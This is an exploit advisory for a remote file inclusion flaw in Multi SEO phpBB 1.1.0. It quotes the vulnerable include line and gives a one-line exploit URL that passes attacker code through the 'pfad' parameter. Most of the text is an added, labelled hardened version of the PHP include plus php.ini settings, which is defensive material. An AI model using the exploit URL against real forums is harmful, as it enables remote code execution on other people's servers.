Multi SEO phpBB 1.1.0 - RFI


[o] Multi SEO phpBB 1.1.0 Remote File Inclusion Vulnerability
Software : Multi SEO phpBB version 1.1.0
Vendor : http://www.phpbb-seo.de/
Download : http://www.phpbb-seo.de/downloads/multi.html

Author : NoGe


[o] Vulnerable file
include/global.php
include_once ($pfad . 'include/config.php');


[o] Exploit
http://localhost/[path]/include/global.php?pfad=[evilcode]
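
[o] Hardened include (added example)
A hardened opening for include/global.php, added here as an example; it is not part of the original advisory or the vendor's code. It assumes $pfad is meant to hold the board's root directory and that the value reaches the script from the request (for example through register_globals); MULTI_SEO_ENTRY is a hypothetical constant.

```php
<?php
// Added example: hardened opening for include/global.php (not vendor code).

// Vulnerable form quoted in the advisory. $pfad is never set in this file,
// so a request parameter named pfad decides what gets included:
//     include_once ($pfad . 'include/config.php');

// 1. Refuse direct web requests. MULTI_SEO_ENTRY is a hypothetical constant
//    that the application's real entry script would define before it
//    includes this file.
if (!defined('MULTI_SEO_ENTRY')) {
    header('HTTP/1.1 403 Forbidden');
    exit;
}

// 2. Build the base path from this file's location on disk, never from
//    request data. Assigning $pfad here discards any injected value.
$pfad = realpath(dirname(__FILE__) . '/..');
if ($pfad === false) {
    exit('Base directory not found');
}
$pfad .= DIRECTORY_SEPARATOR;

// 3. Resolve the target and confirm it is an existing local file that
//    sits under the base path before including it.
$config = realpath($pfad . 'include/config.php');
if ($config === false || strpos($config, $pfad) !== 0) {
    exit('Configuration file not found');
}

include_once $config;

// Defence in depth in php.ini: allow_url_include = Off, and on PHP older
// than 5.4 also register_globals = Off.
```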

